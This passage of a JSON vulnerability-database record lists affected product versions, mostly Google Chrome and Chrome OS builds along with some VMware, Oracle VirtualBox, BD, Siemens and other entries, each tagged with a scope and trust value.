        "version": "34.0.1847.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.926.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.47255"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.39"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1077.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "44.0.2403.157"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.530.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.58"
      },
      {
        "model": "facsmelody",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.122"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.15"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1308.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.633.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.769.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.127"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.785.0"
      },
      {
        "model": "facscanto ii clinical",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.225"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.90"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.11"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.385.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.319.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.908.0"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.204"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.2.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.219"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.374.0"
      },
      {
        "model": "pyxis ecostation system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.23"
      },
      {
        "model": "facscanto ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.40"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1043"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.604.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.150"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.756.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.34"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.886.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.123"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.342"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.51"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.233"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.955.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1082.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.760.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.110"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1658.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.368.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.594.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.118"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.743.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1285.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "62.0.3202.97"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.96365"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "43.0.2357.130"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "63.0.3239.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.83"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.816.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.124"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.393.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.362.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.618.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.628.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.815.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.423.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "62.0.3202.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.802.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.323.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.804.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.370.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.203"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.805.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.789.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.32"
      },
      {
        "model": "totalys slideprep",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "41.0.2272"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.315"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.512.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.109"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0.5"
      },
      {
        "model": "simatic ipc427e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.901.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1285.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.729.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.23"
      },
      {
        "model": "chrome os beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.130.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.483.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.467.0"
      },
      {
        "model": "phoenix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "1000"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.200"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.10"
      },
      {
        "model": "facslink interface",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.25"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.452.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.128.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.111"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1017"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.727.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.748.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.302.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.379.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.654.0"
      },
      {
        "model": "phoenix m50",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.32"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.119"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.334.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.110"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.862.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.0"
      },
      {
        "model": "facsjazz",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.303"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.91"
      },
      {
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.458.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.721.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.404.0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "46.0.2490"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.90"
      },
      {
        "model": "sql server for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201240"
      },
      {
        "model": "chrome",
        "scope": "eq",
